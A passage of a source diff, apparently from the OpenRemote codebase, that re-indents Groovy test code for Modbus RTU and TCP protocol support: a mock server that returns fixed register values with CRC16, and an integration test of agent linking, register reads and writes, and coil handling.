-                    ByteBuffer bb = ByteBuffer.allocate(8)
-                    bb.order(ByteOrder.BIG_ENDIAN)
-                    bb.putLong(-616L) // This represents 18446744073709551000 as unsigned
-                    byte[] longBytes = bb.array()
-                    response[responseOffset] = longBytes[regOffset * 2]
-                    response[responseOffset + 1] = longBytes[regOffset * 2 + 1]
-                } else if (currentAddress >= 400 && currentAddress < 402) {
-                    // Return float value 42.5 for byte/word order test (BIG-BIG) at 400-401
-                    if (i == 0 || currentAddress == 400) {
-                        ByteBuffer bb = ByteBuffer.allocate(4)
-                        bb.order(ByteOrder.BIG_ENDIAN)
-                        bb.putFloat(42.5f)
-                        byte[] floatBytes = bb.array()
-                        System.arraycopy(floatBytes, 0, response, 3, 4)
-                        break
-                    }
-                } else if (currentAddress >= 410 && currentAddress < 412) {
-                    // Return float value 42.5 for byte/word order test (BIG-LITTLE) at 410-411
-                    if (i == 0 || currentAddress == 410) {
-                        ByteBuffer bb = ByteBuffer.allocate(4)
-                        bb.order(ByteOrder.BIG_ENDIAN)
-                        bb.putFloat(42.5f)
-                        byte[] floatBytes = bb.array()
-                        System.arraycopy(floatBytes, 0, response, 3, 4)
-                        break
-                    }
-                } else if (currentAddress >= 420 && currentAddress < 422) {
-                    // Return float value 42.5 for byte/word order test (LITTLE-BIG) at 420-421
-                    if (i == 0 || currentAddress == 420) {
-                        ByteBuffer bb = ByteBuffer.allocate(4)
-                        bb.order(ByteOrder.BIG_ENDIAN)
-                        bb.putFloat(42.5f)
-                        byte[] floatBytes = bb.array()
-                        System.arraycopy(floatBytes, 0, response, 3, 4)
-                        break
-                    }
-                } else if (currentAddress >= 430 && currentAddress < 432) {
-                    // Return float value 42.5 for byte/word order test (LITTLE-LITTLE) at 430-431
-                    if (i == 0 || currentAddress == 430) {
-                        ByteBuffer bb = ByteBuffer.allocate(4)
-                        bb.order(ByteOrder.BIG_ENDIAN)
-                        bb.putFloat(42.5f)
-                        byte[] floatBytes = bb.array()
-                        System.arraycopy(floatBytes, 0, response, 3, 4)
-                        break
-                    }
-                } else if (currentAddress >= 500 && currentAddress < 504) {
-                    // Return double value 999.888 for byte/word order test (BIG-BIG) at 500-503
-                    int regOffset = currentAddress - 500
-                    ByteBuffer bb = ByteBuffer.allocate(8)
-                    bb.order(ByteOrder.BIG_ENDIAN)
-                    bb.putDouble(999.888d)
-                    byte[] doubleBytes = bb.array()
-                    int copyLen = Math.min(2, 8 - (regOffset * 2))
-                    System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, copyLen)
-                } else if (currentAddress >= 510 && currentAddress < 514) {
-                    // Return double value 999.888 for byte/word order test (LITTLE-LITTLE) at 510-513
-                    int regOffset = currentAddress - 510
-                    ByteBuffer bb = ByteBuffer.allocate(8)
-                    bb.order(ByteOrder.BIG_ENDIAN)
-                    bb.putDouble(999.888d)
-                    byte[] doubleBytes = bb.array()
-                    int copyLen = Math.min(2, 8 - (regOffset * 2))
-                    System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, copyLen)
-                } else {
-                    // Return incrementing values
-                    int value = currentAddress
-                    response[responseOffset] = (byte) (value >> 8)
-                    response[responseOffset + 1] = (byte) (value & 0xFF)
-                }
+          } else if (currentAddress >= 300 && currentAddress < 304) {
+            // Return double value 123.456789 at registers 300-303
+            if (i == 0 || currentAddress == 300) {
+              int regOffset = currentAddress - 300
+              ByteBuffer bb = ByteBuffer.allocate(8)
+              bb.order(ByteOrder.BIG_ENDIAN)
+              bb.putDouble(123.456789d)
+              byte[] doubleBytes = bb.array()
+              int copyLen = Math.min(registerBytes - (responseOffset - 3), 8 - (regOffset * 2))
+              System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, Math.min(copyLen, 8))
             }
-            break
-
-        case 0x05: // Write Single Coil
-            response = new byte[8]
-            System.arraycopy(request, offset, response, 0, 6)
-            break
-
-        case 0x06: // Write Single Register
-            response = new byte[8]
-            System.arraycopy(request, offset, response, 0, 6)
-            break
-
-        case 0x0F: // Write Multiple Coils
-        case 0x10: // Write Multiple Registers
-            // Response echoes: Unit ID + FC + Start Address + Quantity
-            response = new byte[8]
-            System.arraycopy(request, offset, response, 0, 6)
-            break
-
-        default:
-            // Exception response
-            response = new byte[5]
-            response[0] = (byte) unitId
-            response[1] = (byte) (functionCode | 0x80)
-            response[2] = (byte) 0x01  // Illegal function
-            return addCRC(response, 3)
+          } else if (currentAddress >= 310 && currentAddress < 314) {
+            // Return 64-bit signed integer: -9223372036854775000L at registers 310-313
+            int regOffset = currentAddress - 310
+            ByteBuffer bb = ByteBuffer.allocate(8)
+            bb.order(ByteOrder.BIG_ENDIAN)
+            bb.putLong(-9223372036854775000L)
+            byte[] longBytes = bb.array()
+            response[responseOffset] = longBytes[regOffset * 2]
+            response[responseOffset + 1] = longBytes[regOffset * 2 + 1]
+          } else if (currentAddress >= 320 && currentAddress < 324) {
+            // Return 64-bit unsigned integer at registers 320-323
+            int regOffset = currentAddress - 320
+            ByteBuffer bb = ByteBuffer.allocate(8)
+            bb.order(ByteOrder.BIG_ENDIAN)
+            bb.putLong(-616L) // This represents 18446744073709551000 as unsigned
+            byte[] longBytes = bb.array()
+            response[responseOffset] = longBytes[regOffset * 2]
+            response[responseOffset + 1] = longBytes[regOffset * 2 + 1]
+          } else if (currentAddress >= 400 && currentAddress < 402) {
+            // Return float value 42.5 for byte/word order test (BIG-BIG) at 400-401
+            if (i == 0 || currentAddress == 400) {
+              ByteBuffer bb = ByteBuffer.allocate(4)
+              bb.order(ByteOrder.BIG_ENDIAN)
+              bb.putFloat(42.5f)
+              byte[] floatBytes = bb.array()
+              System.arraycopy(floatBytes, 0, response, 3, 4)
+              break
+            }
+          } else if (currentAddress >= 410 && currentAddress < 412) {
+            // Return float value 42.5 for byte/word order test (BIG-LITTLE) at 410-411
+            if (i == 0 || currentAddress == 410) {
+              ByteBuffer bb = ByteBuffer.allocate(4)
+              bb.order(ByteOrder.BIG_ENDIAN)
+              bb.putFloat(42.5f)
+              byte[] floatBytes = bb.array()
+              System.arraycopy(floatBytes, 0, response, 3, 4)
+              break
+            }
+          } else if (currentAddress >= 420 && currentAddress < 422) {
+            // Return float value 42.5 for byte/word order test (LITTLE-BIG) at 420-421
+            if (i == 0 || currentAddress == 420) {
+              ByteBuffer bb = ByteBuffer.allocate(4)
+              bb.order(ByteOrder.BIG_ENDIAN)
+              bb.putFloat(42.5f)
+              byte[] floatBytes = bb.array()
+              System.arraycopy(floatBytes, 0, response, 3, 4)
+              break
+            }
+          } else if (currentAddress >= 430 && currentAddress < 432) {
+            // Return float value 42.5 for byte/word order test (LITTLE-LITTLE) at 430-431
+            if (i == 0 || currentAddress == 430) {
+              ByteBuffer bb = ByteBuffer.allocate(4)
+              bb.order(ByteOrder.BIG_ENDIAN)
+              bb.putFloat(42.5f)
+              byte[] floatBytes = bb.array()
+              System.arraycopy(floatBytes, 0, response, 3, 4)
+              break
+            }
+          } else if (currentAddress >= 500 && currentAddress < 504) {
+            // Return double value 999.888 for byte/word order test (BIG-BIG) at 500-503
+            int regOffset = currentAddress - 500
+            ByteBuffer bb = ByteBuffer.allocate(8)
+            bb.order(ByteOrder.BIG_ENDIAN)
+            bb.putDouble(999.888d)
+            byte[] doubleBytes = bb.array()
+            int copyLen = Math.min(2, 8 - (regOffset * 2))
+            System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, copyLen)
+          } else if (currentAddress >= 510 && currentAddress < 514) {
+            // Return double value 999.888 for byte/word order test (LITTLE-LITTLE) at 510-513
+            int regOffset = currentAddress - 510
+            ByteBuffer bb = ByteBuffer.allocate(8)
+            bb.order(ByteOrder.BIG_ENDIAN)
+            bb.putDouble(999.888d)
+            byte[] doubleBytes = bb.array()
+            int copyLen = Math.min(2, 8 - (regOffset * 2))
+            System.arraycopy(doubleBytes, regOffset * 2, response, responseOffset, copyLen)
+          } else {
+            // Return incrementing values
+            int value = currentAddress
+            response[responseOffset] = (byte) (value >> 8)
+            response[responseOffset + 1] = (byte) (value & 0xFF)
+          }
         }
+        break
 
-        return addCRC(response, response.length - 2)
+      case 0x05: // Write Single Coil
+        response = new byte[8]
+        System.arraycopy(request, offset, response, 0, 6)
+        break
+
+      case 0x06: // Write Single Register
+        response = new byte[8]
+        System.arraycopy(request, offset, response, 0, 6)
+        break
+
+      case 0x0F: // Write Multiple Coils
+      case 0x10: // Write Multiple Registers
+      // Response echoes: Unit ID + FC + Start Address + Quantity
+        response = new byte[8]
+        System.arraycopy(request, offset, response, 0, 6)
+        break
+
+      default:
+      // Exception response
+        response = new byte[5]
+        response[0] = (byte) unitId
+        response[1] = (byte) (functionCode | 0x80)
+        response[2] = (byte) 0x01 // Illegal function
+        return addCRC(response, 3)
     }
 
-    /**
-     * Calculate and add CRC16 to Modbus RTU frame
-     */
-    private static byte[] addCRC(byte[] data, int length) {
-        int crc = 0xFFFF
-        for (int i = 0; i < length; i++) {
-            crc ^= (data[i] & 0xFF)
-            for (int j = 0; j < 8; j++) {
-                if ((crc & 1) != 0) {
-                    crc = (crc >> 1) ^ 0xA001
-                } else {
-                    crc = crc >> 1
-                }
-            }
+    return addCRC(response, response.length - 2)
+  }
+
+  /**
+   * Calculate and add CRC16 to Modbus RTU frame
+   */
+  private static byte[] addCRC(byte[] data, int length) {
+    int crc = 0xFFFF
+    for (int i = 0; i <length; i++) {
+      crc ^= (data[i] & 0xFF)
+      for (int j = 0; j < 8; j++) {
+        if ((crc & 1) != 0) {
+          crc = (crc >> 1) ^ 0xA001
+        } else {
+          crc = crc >> 1
         }
-        data[length] = (byte) (crc & 0xFF)
-        data[length + 1] = (byte) (crc >> 8)
-        return data
+      }
     }
+    data[length] = (byte) (crc & 0xFF)
+    data[length + 1] = (byte) (crc >> 8)
+    return data
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/modbus/ModbusTcpTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/modbus/ModbusTcpTest.groovy
@@ -63,865 +63,873 @@ import static org.openremote.model.value.MetaItemType.AGENT_LINK
 
 class ModbusTcpTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    int modbusServerPort
+  @Shared
+  int modbusServerPort
 
-    @Shared
-    NettyTcpModbusServer server
+  @Shared
+  NettyTcpModbusServer server
 
-    @Shared
-    AtomicReference<ModbusMessage> latestReadMessage = new AtomicReference(null)
+  @Shared
+  AtomicReference<ModbusMessage> latestReadMessage = new AtomicReference(null)
 
-    @Shared
-    AtomicReference<ModbusMessage> latestWriteMessage = new AtomicReference(null)
+  @Shared
+  AtomicReference<ModbusMessage> latestWriteMessage = new AtomicReference(null)
 
-    def setupSpec() {
-        modbusServerPort = findEphemeralPort()
-        server = new NettyTcpModbusServer(modbusServerPort)
-        server.setMessageHandler((msg, sender) -> {
-            ModbusMessage modbusMessage = null
-            switch (msg.getFunction().blockType()) {
+  def setupSpec() {
+    modbusServerPort = findEphemeralPort()
+    server = new NettyTcpModbusServer(modbusServerPort)
+    server.setMessageHandler((msg, sender) -> {
+      ModbusMessage modbusMessage = null
+      switch (msg.getFunction().blockType()) {
                 case ModbusBlockType.Coil -> {
-                    BitsModbusMessage tcpRequest = msg.unwrap(BitsModbusMessage.class)
-                    if (msg.getFunction().isReadFunction()) {
-                        modbusMessage = readCoilsResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount(), BigInteger.valueOf(0xFFFF))
-                    } else {
-                        if (tcpRequest.getFunction().getCode() == WRITE_COILS) {
-                            modbusMessage = writeCoilsResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount())
-                        } else if (tcpRequest.getFunction().getCode() == WRITE_COIL) {
-                            modbusMessage = writeCoilResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), true)
-                        }
+                  BitsModbusMessage tcpRequest = msg.unwrap(BitsModbusMessage.class)
+                  if (msg.getFunction().isReadFunction()) {
+                    modbusMessage = readCoilsResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount(), BigInteger.valueOf(0xFFFF))
+                  } else {
+                    if (tcpRequest.getFunction().getCode() == WRITE_COILS) {
+                      modbusMessage = writeCoilsResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount())
+                    } else if (tcpRequest.getFunction().getCode() == WRITE_COIL) {
+                      modbusMessage = writeCoilResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), true)
                     }
+                  }
                 }
                 case ModbusBlockType.Discrete -> {
-                    BitsModbusMessage tcpRequest = msg.unwrap(BitsModbusMessage.class)
-                    modbusMessage = readDiscretesResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount(), BigInteger.valueOf(0xFFFF))
+                  BitsModbusMessage tcpRequest = msg.unwrap(BitsModbusMessage.class)
+                  modbusMessage = readDiscretesResponse(tcpRequest.getUnitId(), tcpRequest.getAddress(), tcpRequest.getCount(), BigInteger.valueOf(0xFFFF))
                 }
                 case ModbusBlockType.Holding -> {
-                    RegistersModbusMessage registerRequest = msg.unwrap(RegistersModbusMessage.class)
-                    if (msg.getFunction().isReadFunction()) {
-                        // Generate mock data based on address and count
-                        short[] mockData = generateMockHoldingData(registerRequest.getAddress(), registerRequest.getCount())
-                        println("TCP Mock: address=${registerRequest.getAddress()}, count=${registerRequest.getCount()}, data=${mockData.collect{String.format('0x%04X', it & 0xFFFF)}}")
-                        modbusMessage = readHoldingsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), mockData)
-                    } else {
-                        if (registerRequest.getFunction().getCode() == WRITE_HOLDING_REGISTERS) {
-                            modbusMessage = writeHoldingsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), registerRequest.getCount())
-                        } else if (registerRequest.getFunction().getCode() == WRITE_HOLDING_REGISTER) {
-                            modbusMessage = writeHoldingResponse(registerRequest.getUnitId(), registerRequest.getAddress(), 21)
-                        }
+                  RegistersModbusMessage registerRequest = msg.unwrap(RegistersModbusMessage.class)
+                  if (msg.getFunction().isReadFunction()) {
+                    // Generate mock data based on address and count
+                    short[] mockData = generateMockHoldingData(registerRequest.getAddress(), registerRequest.getCount())
+                    println("TCP Mock: address=${registerRequest.getAddress()}, count=${registerRequest.getCount()}, data=${mockData.collect{String.format('0x%04X', it & 0xFFFF)}}")
+                    modbusMessage = readHoldingsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), mockData)
+                  } else {
+                    if (registerRequest.getFunction().getCode() == WRITE_HOLDING_REGISTERS) {
+                      modbusMessage = writeHoldingsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), registerRequest.getCount())
+                    } else if (registerRequest.getFunction().getCode() == WRITE_HOLDING_REGISTER) {
+                      modbusMessage = writeHoldingResponse(registerRequest.getUnitId(), registerRequest.getAddress(), 21)
                     }
+                  }
                 }
                 case ModbusBlockType.Input -> {
-                    RegistersModbusMessage registerRequest = msg.unwrap(RegistersModbusMessage.class)
-                    modbusMessage = readInputsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), new short[]{11, 12, 13, 14, 15, 16, 17, 18, 19, 20})
+                  RegistersModbusMessage registerRequest = msg.unwrap(RegistersModbusMessage.class)
+                  modbusMessage = readInputsResponse(registerRequest.getUnitId(), registerRequest.getAddress(), new short[]{
+                            11, 12, 13, 14, 15, 16, 17, 18, 19, 20
+                          })
                 }
                 case ModbusBlockType.Diagnostic -> {
-                    modbusMessage = new BaseModbusMessage(msg.getUnitId(), msg.getFunction(), ModbusErrorCode.Acknowledge)
+                  modbusMessage = new BaseModbusMessage(msg.getUnitId(), msg.getFunction(), ModbusErrorCode.Acknowledge)
                 }
-            }
+              }
 
-            if (msg.getFunction().isReadFunction()) {
-                latestReadMessage.set(msg)
-            } else {
-                latestWriteMessage.set(msg)
-            }
-            sender.accept(modbusMessage)
-
+      if (msg.getFunction().isReadFunction()) {
+        latestReadMessage.set(msg)
+      } else {
+        latestWriteMessage.set(msg)
+      }
+      sender.accept(modbusMessage)
     })
-        server.start()
+    server.start()
+  }
+
+  def cleanupSpec() {
+    server.stop()
+  }
+
+  static short[] generateMockHoldingData(int address, int count) {
+    short[] data = new short[count]
+
+    // Basic registers (0-9): simple sequential values
+    // 64-bit test registers (100-111): specific values for LINT, ULINT, LREAL
+    // Byte/Word order test registers (200-207): values to test endianness
+
+    for (int i = 0; i <count; i++) {
+      int registerAddress = address + i + 1
+
+      if (registerAddress >= 1 && registerAddress <= 10) {
+        // Basic sequential values for simple tests
+        data[i] = (short)(registerAddress)
+      } else if (registerAddress >= 100 && registerAddress < 112) {
+        // 64-bit data type test values
+        // LINT at 100-103 (4 registers): value = 1234567890123456L
+        // ULINT at 104-107 (4 registers): value = 9876543210987654L
+        // LREAL at 108-111 (4 registers): value = 123.456789
+
+        if (registerAddress >= 100 && registerAddress <= 103) {
+          // LINT: 1234567890123456L = 0x000462D53C8ABAC0
+          long lintValue = 1234567890123456L
+          int regIndex = registerAddress - 100
+          data[i] = (short)((lintValue >> (48 - regIndex * 16)) & 0xFFFF)
+        } else if (registerAddress >= 104 && registerAddress <= 107) {
+          // ULINT: 9876543210987654L = 0x00231D31F8D09706
+          long ulintValue = 9876543210987654L
+          int regIndex = registerAddress - 104
+          data[i] = (short)((ulintValue >> (48 - regIndex * 16)) & 0xFFFF)
+        } else if (registerAddress >= 108 && registerAddress <= 111) {
+          // LREAL: 123.456789 = 0x405EDD2F1A9FBE77
+          long lrealBits = Double.doubleToRawLongBits(123.456789)
+          int regIndex = registerAddress - 108
+          data[i] = (short)((lrealBits >> (48 - regIndex * 16)) & 0xFFFF)
+        }
+      } else if (registerAddress >= 200 && registerAddress < 208) {
+        // Byte/Word order test values
+        // INT32 at 200-201: value = 0x12345678
+        // FLOAT at 202-203: value = 12.34f
+        // INT32 at 204-205: value = 0xABCDEF01
+        // FLOAT at 206-207: value = 56.78f
+
+        if (registerAddress == 200) {
+          data[i] = (short)0x1234
+        } else if (registerAddress == 201) {
+          data[i] = (short)0x5678
+        } else if (registerAddress == 202 || registerAddress == 203) {
+          // FLOAT 12.34f = 0x4145C28F
+          int floatBits = Float.floatToRawIntBits(12.34f)
+          data[i] = (short)((floatBits >> ((203 - registerAddress) * 16)) & 0xFFFF)
+        } else if (registerAddress == 204) {
+          data[i] = (short)0xABCD
+        } else if (registerAddress == 205) {
+          data[i] = (short)0xEF01
+        } else if (registerAddress == 206 || registerAddress == 207) {
+          // FLOAT 56.78f = 0x42633d71
+          int floatBits = Float.floatToRawIntBits(56.78f)
+          data[i] = (short)((floatBits >> ((207 - registerAddress) * 16)) & 0xFFFF)
+        }
+      } else {
+        // Default: return address-based value
+        data[i] = (short)(registerAddress % 100)
+      }
     }
 
-    def cleanupSpec() {
-        server.stop()
+    return data
+  }
+
+  def "Modbus TCP Integration Test - Basic Operations"() {
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a mock Modbus agent is created"
+    def agent = new ModbusTcpAgent("Modbus")
+    agent.setRealm(MASTER_REALM)
+
+    agent.setHost("127.0.0.1")
+    agent.setPort(modbusServerPort)
+
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((ModbusTcpProtocol)agentService.getProtocolInstance(agent.id)) != null
     }
 
-    static short[] generateMockHoldingData(int address, int count) {
-        short[] data = new short[count]
-
-        // Basic registers (0-9): simple sequential values
-        // 64-bit test registers (100-111): specific values for LINT, ULINT, LREAL
-        // Byte/Word order test registers (200-207): values to test endianness
-
-        for (int i = 0; i < count; i++) {
-            int registerAddress = address + i + 1
-
-            if (registerAddress >= 1 && registerAddress <= 10) {
-                // Basic sequential values for simple tests
-                data[i] = (short)(registerAddress)
-            } else if (registerAddress >= 100 && registerAddress < 112) {
-                // 64-bit data type test values
-                // LINT at 100-103 (4 registers): value = 1234567890123456L
-                // ULINT at 104-107 (4 registers): value = 9876543210987654L
-                // LREAL at 108-111 (4 registers): value = 123.456789
-
-                if (registerAddress >= 100 && registerAddress <= 103) {
-                    // LINT: 1234567890123456L = 0x000462D53C8ABAC0
-                    long lintValue = 1234567890123456L
-                    int regIndex = registerAddress - 100
-                    data[i] = (short)((lintValue >> (48 - regIndex * 16)) & 0xFFFF)
-                } else if (registerAddress >= 104 && registerAddress <= 107) {
-                    // ULINT: 9876543210987654L = 0x00231D31F8D09706
-                    long ulintValue = 9876543210987654L
-                    int regIndex = registerAddress - 104
-                    data[i] = (short)((ulintValue >> (48 - regIndex * 16)) & 0xFFFF)
-                } else if (registerAddress >= 108 && registerAddress <= 111) {
-                    // LREAL: 123.456789 = 0x405EDD2F1A9FBE77
-                    long lrealBits = Double.doubleToRawLongBits(123.456789)
-                    int regIndex = registerAddress - 108
-                    data[i] = (short)((lrealBits >> (48 - regIndex * 16)) & 0xFFFF)
-                }
-            } else if (registerAddress >= 200 && registerAddress < 208) {
-                // Byte/Word order test values
-                // INT32 at 200-201: value = 0x12345678
-                // FLOAT at 202-203: value = 12.34f
-                // INT32 at 204-205: value = 0xABCDEF01
-                // FLOAT at 206-207: value = 56.78f
-
-                if (registerAddress == 200) {
-                    data[i] = (short)0x1234
-                } else if (registerAddress == 201) {
-                    data[i] = (short)0x5678
-                } else if (registerAddress == 202 || registerAddress == 203) {
-                    // FLOAT 12.34f = 0x4145C28F
-                    int floatBits = Float.floatToRawIntBits(12.34f)
-                    data[i] = (short)((floatBits >> ((203 - registerAddress) * 16)) & 0xFFFF)
-                } else if (registerAddress == 204) {
-                    data[i] = (short)0xABCD
-                } else if (registerAddress == 205) {
-                    data[i] = (short)0xEF01
-                } else if (registerAddress == 206 || registerAddress == 207) {
-                    // FLOAT 56.78f = 0x42633d71
-                    int floatBits = Float.floatToRawIntBits(56.78f)
-                    data[i] = (short)((floatBits >> ((207 - registerAddress) * 16)) & 0xFFFF)
-                }
-            } else {
-                // Default: return address-based value
-                data[i] = (short)(registerAddress % 100)
-            }
-        }
-
-        return data
+    and: "the connection status should be CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.getId())
+      agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
     }
 
-    def "Modbus TCP Integration Test - Basic Operations"() {
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    when: "a device with partial read configuration is created (missing readValueType)"
+    def device = new ThingAsset("Partial Config Device")
+    device.setRealm(MASTER_REALM)
+    device.addOrReplaceAttributes(
+            // Partial read config - has readMemoryArea and readAddress but missing readValueType
+            new Attribute<>("partialReadConfig", ValueType.INTEGER).addOrReplaceMeta(
+                    new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
+                    .tap {
+                      it.setUnitId(1)
+                      it.setRequestInterval(1000)
+                      it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
+                      it.setReadAddress(550)
+                      // Missing: readValueType
+                    }
+                    )
+                    )
+            )
+    device = assetStorageService.merge(device)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-
-        and: "a mock Modbus agent is created"
-        def agent = new ModbusTcpAgent("Modbus")
-        agent.setRealm(MASTER_REALM)
-
-        agent.setHost("127.0.0.1")
-        agent.setPort(modbusServerPort)
-
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((ModbusTcpProtocol)agentService.getProtocolInstance(agent.id)) != null
-        }
-
-        and: "the connection status should be CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.getId())
-            agent.getAttribute(Agent.STATUS).get().getValue().get() == ConnectionStatus.CONNECTED
-        }
-
-        when: "a device with partial read configuration is created (missing readValueType)"
-        def device = new ThingAsset("Partial Config Device")
-        device.setRealm(MASTER_REALM)
-        device.addOrReplaceAttributes(
-                // Partial read config - has readMemoryArea and readAddress but missing readValueType
-                new Attribute<>("partialReadConfig", ValueType.INTEGER).addOrReplaceMeta(
-                        new MetaItem<>(AGENT_LINK, new ModbusAgentLink(agent.getId())
-                                .tap {
-                                    it.setUnitId(1)
-                                    it.setRequestInterval(1000)
-                                    it.setReadMemoryArea(ModbusAgentLink.ReadMemoryArea.HOLDING)
-                                    it.setReadAddress(550)
-                                    // Missing: readValueType
-                                }
-                        )
-                )
-        )
-        device = assetStorageService.merge(device)
-
-        then: "the attribute should be linked without creating read polling tasks"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-            // No batch groups should be created for incomplete read config
-            assert protocol.batchGroups.isEmpty()
-        }
-
-        when: "A ShipAsset is created with an agent link"
-        ShipAsset ship = new ShipAsset("testAsset")
-        ship.setRealm(MASTER_REALM)
-        ship.addOrReplaceAttributes(new Attribute<Object>(ShipAsset.SPEED).addOrReplaceMeta(new MetaItem<>(
-                AGENT_LINK,
-                new ModbusAgentLink(
-                        id: agent.getId(),
-                        unitId: 1,
-                        requestInterval: 1000,
-                        readMemoryArea: ModbusAgentLink.ReadMemoryArea.HOLDING,
-                        readValueType: ModbusAgentLink.ModbusDataType.UINT,
-                        readAddress: 2,
-                        writeMemoryArea: ModbusAgentLink.WriteMemoryArea.HOLDING,
-                        writeAddress: 3
-                )
-        )))
-        ship = assetStorageService.merge(ship)
-        ModbusAgentLink agentLink
-
-
-        then: "a client should be created and the pollingMap is populated"
-        conditions.eventually {
-            def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
-            assert protocol != null
-            assert protocol.batchGroups.size() > 0
-
-            ship = assetStorageService.find(ship.getId(), true)
-            agentLink = ship.getAttribute(ShipAsset.SPEED).get().getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
-            assert ship.getAttribute(ShipAsset.SPEED).flatMap { it.getValue() }.orElse(null) == 2
-
-            assert (latestReadMessage.get() as ModbusMessage).getUnitId() === 1
-            assert (latestReadMessage.get() as ModbusMessage).getFunction() === ModbusFunctionCode.ReadHoldingRegisters
-            assert (latestReadMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage.class).getAddress() == agentLink.getReadAddress()-1
-            assert (latestReadMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage.class).getCount() == 1
-        }
-
-        when: "the attribute is updated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(ship.getId(), ShipAsset.SPEED, 123D))
-        ship.addOrReplaceAttributes(new Attribute<?>(ShipAsset.SPEED, 10))
-
-        then: "the value is sent to the Modbus server"
-        conditions.eventually {
-            def msg = (latestWriteMessage.get() as ModbusMessage).unwrap(RegistersModbusMessage)
-            assert msg != null
-            assert msg.getCount() == 1
-            assert msg.getAddress() == agentLink.getWriteAddress()-1
-            assert msg.dataDecodeUnsigned() == [123] as int[]
-
-            ship = assetStorageService.find(ship.getId(), true)
-            assert ship.getAttribute(ShipAsset.SPEED).get().getValue().orElse(0) == 2.0
-        }
-
-        when: "I add a new coil attribute and remove the Agent Link from the speed attribute"
-        ship.addOrReplaceAttributes(new Attribute<Integer>("coil1", ValueType.BOOLEAN).addOrReplaceMeta(new MetaItem<>(
-                AGENT_LINK,
-                new ModbusAgentLink(
-                        id: agent.getId(),
-                        unitId: 1,
-                        requestInterval: 1000,
-                        readMemoryArea: ModbusAgentLink.ReadMemoryArea.COIL,
-                        readValueType: ModbusAgentLink.ModbusDataType.BOOL,
-                        readAddress: 5,
-                        writeMemoryArea: ModbusAgentLink.WriteMemoryArea.COIL,
-                        writeAddress: 6
-                )
-        )))
-        ship.addOrReplaceAttributes(new Attribute<Object>(ShipAsset.SPEED).setMeta(Map.of() as MetaMap))
-        latestReadMessage.set(null)
-        latestWriteMessage.set(null)
-
-        and: "I merge it"
-        ship = assetStorageService.merge(ship)
-
-        then: "I should receive the correct value in the coil"
-
-        conditions.eventually {
-            agentLink = ship.getAttribute("coil1").get().getMetaItem(AGENT_LINK).get().getValue(ModbusAgentLink.class).get()
-
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((ModbusTcpProtocol)agentService.getProtocolInstance(agent.id)) != null
-
-            def msg = (latestReadMessage.get() as ModbusMessage).unwrap(BitsModbusMessage)
-            assert msg != null
-            assert msg.getCount() == 1
-            assert msg.getAddress() == agentLink.getReadAddress()-1
-
-            ship = assetStorageService.find(ship.getId(), true)
-            assert ship.getAttribute("coil1").flatMap { it.getValue() }.orElse(null) == true
-        }
-
-        when: "I update the value of the coil"
-
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(ship.getId(), "coil1", true))
-
-        then: "the coil is read properly"
-
-        conditions.eventually {
-            def msg = (latestWriteMessage.get() as ModbusMessage).unwrap(BitsModbusMessage)
-            assert msg != null
-            assert msg.getCount() == 1
-            assert msg.getAddress() == 5
-            assert msg.getBits() == BigInteger.valueOf(0x0001)
-
-            ship = assetStorageService.find(ship.getId(), true)
-            assert ship.getAttribute("coil1").flatMap { it.getValue() }.orElse(null) == true
-        }
+    then: "the attribute should be linked without creating read polling tasks"
+    conditions.eventually {
+      def protocol = agentService.getProtocolInstance(agent.id) as ModbusTcpProtocol
+      assert protocol != null
+      // No batch groups should be created for incomplete read config
+      assert protocol.batchGroups.isEmpty()
     }
 
-    def "Modbus TCP Test - Register Batching"() {
-        given: "expected conditions"
